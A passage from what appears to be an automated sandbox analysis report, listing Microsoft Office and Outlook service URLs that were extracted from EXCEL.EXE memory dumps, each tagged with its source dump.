      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsont
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/r
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/queryTemplateStarthttps://
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxAwsCgQueryhttps://
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: EXCEL.EXE, 00000000.00000002.965309540.00000000129A0000.00000004.00000001.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionsB
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13IdentityServicehttps://identity.
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://powerlift-frontdesk.acompli.netPowerLiftGymBaseUrlhttps://powerlift.acompli.netSubstrateOffi
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents9
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsMBI_SSLhttps://rpsticket.partnerservices.getmicr
      Source: EXCEL.EXE, 00000000.00000003.673790254.0000000012AD3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://roaming.edog.
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://settings.outlook.com
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistaF
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workPowerBIGetDatasetsApihttps://api.pow
      Source: EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oau
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workw
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://staging.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aiBearer
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aihttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.airl
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrites
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory2
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryMBI_SSL
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/initMBI_SSL
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com5S
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com6Q
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com8
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com9R
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.compP
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comrl
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comuQ
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://tasks.office.com
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://tasks.office.comt
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/r
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmlI
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmlInsightsImmersivehttps
